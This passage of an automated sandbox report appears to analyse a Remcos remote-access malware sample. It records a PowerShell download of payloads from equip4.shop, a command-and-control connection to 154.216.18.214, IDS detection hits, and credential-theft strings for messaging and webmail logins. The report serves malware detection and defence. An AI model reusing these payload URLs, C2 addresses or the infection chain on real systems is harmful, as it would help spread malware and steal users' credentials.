              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.2045907923.0000000006FDD000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_1FC710F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 154.216.18.214:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 154.216.18.214:2404
              Source: Malware configuration extractorURLs: 154.216.18.214
              Source: global trafficTCP traffic: 192.168.2.4:49738 -> 154.216.18.214:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 104.21.56.207:80
              Source: global trafficHTTP traffic detected: GET /FvMVdpFg/Atols.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: equip4.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /OaDlaEkr/ZMtPPuAqIIoCDAp111.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: equip4.shopCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: unknownTCP traffic detected without corresponding DNS query: 154.216.18.214
              Source: global trafficHTTP traffic detected: GET /FvMVdpFg/Atols.rar HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: equip4.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /OaDlaEkr/ZMtPPuAqIIoCDAp111.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: equip4.shopCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: msiexec.exe, 00000008.00000002.3028207567.000000001FC40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000A.00000003.2193037694.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194835668.00000000008EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: msiexec.exe, 0000000A.00000003.2193037694.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194835668.00000000008EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: bhv9E46.tmp.10.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: bhv9E46.tmp.10.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
              Source: msiexec.exe, 00000008.00000002.3028615098.00000000200B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: msiexec.exe, 00000008.00000002.3028615098.00000000200B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: equip4.shop
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: powershell.exe, 00000003.00000002.2045907923.0000000006FDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 00000001.00000002.1876984080.00000112E45A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftBp
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: powershell.exe, 00000001.00000002.1877272550.00000112E6117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1877272550.00000112E7B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1877272550.00000112E77F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://equip4.shop
              Source: powershell.exe, 00000001.00000002.1877272550.00000112E6117000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://equip4.shop/FvMVdpFg/Atols.rarP
              Source: powershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://equip4.shop/FvMVdpFg/Atols.rarXR1l
              Source: msiexec.exe, 00000008.00000002.3027613300.000000001F470000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.bin
              Source: msiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.bin$
              Source: msiexec.exe, 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://equip4.shop/OaDlaEkr/ZMtPPuAqIIoCDAp111.binL
              Source: msiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3010031908.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2164797616.0000000000699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: msiexec.exe, 00000008.00000003.2153435021.0000000000698000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2153308251.0000000000697000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2166795122.0000000000688000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2163785144.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2166598432.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2165888413.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2162793689.0000000000699000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2164797616.0000000000699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpO
              Source: msiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpjb5W7
              Source: msiexec.exe, 00000008.00000002.3010031908.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: msiexec.exe, 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl0b
              Source: powershell.exe, 00000001.00000002.1898960358.00000112F5F61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: powershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1877272550.00000112E5EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2027928945.0000000004611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2170309707.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2170273131.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: msiexec.exe, 00000008.00000002.3028207567.000000001FC40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: msiexec.exe, 00000008.00000002.3028207567.000000001FC40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: msiexec.exe, 0000000D.00000003.2170309707.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2170273131.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
              Source: bhv9E46.tmp.10.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
              Source: msiexec.exe, 0000000A.00000002.2193776072.00000000000F3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: msiexec.exe, 0000000D.00000002.2171038559.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: powershell.exe, 00000001.00000002.1877272550.00000112E5EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000003.00000002.2027928945.0000000004611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
              Source: powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.2039511100.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: powershell.exe, 00000003.00000002.2027928945.0000000004767000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1877272550.00000112E6A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
              Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
              Source: bhv9E46.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
